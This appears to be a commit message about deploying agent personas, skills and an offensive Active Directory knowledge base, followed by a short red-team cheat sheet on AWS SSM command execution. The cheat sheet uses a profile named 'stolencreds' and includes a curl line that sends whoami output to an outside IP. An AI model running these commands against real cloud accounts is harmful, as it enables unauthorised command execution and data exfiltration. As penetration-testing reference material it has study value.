448d1cdcd9
- install_opencode: deploys 29 personas as agents + 1011 skills to
~/.config/opencode/{agents,skills}/. Uses OpenCode's markdown+YAML
agent format (mode/color/permission) and SKILL.md format.
- Topic filter with sensible defaults (drops marketing/biz ~514 skills).
CLI: --opencode-topics security-offensive,coding-backend,...
- Clone of swisskyrepo/InternalAllTheThings (168 MD, 1.7MB) added to
_shared/ as a reference trove for AD attack paths, ADCS ESC1-15,
Kerberos delegation, NTLM relay/coerce, lateral movement, persistence.
- NEO redteam + VORTEX cloud-ad personas reference the new KB with
MITRE ATT&CK TTP mapping pointers.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
1.3 KiB
1.3 KiB
AWS - Service - SSM
Command execution
⚠️ The ssm-user account is not removed from the system when SSM Agent is uninstalled.
SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
- Windows Server 2008-2012 R2 AMIs published in November 2016 or later
- Windows Server 2016 and 2019
- Amazon Linux
- Amazon Linux 2
- Ubuntu Server 16.04
- Ubuntu Server 18.04
- Amazon ECS-Optimized
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
e.g:
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1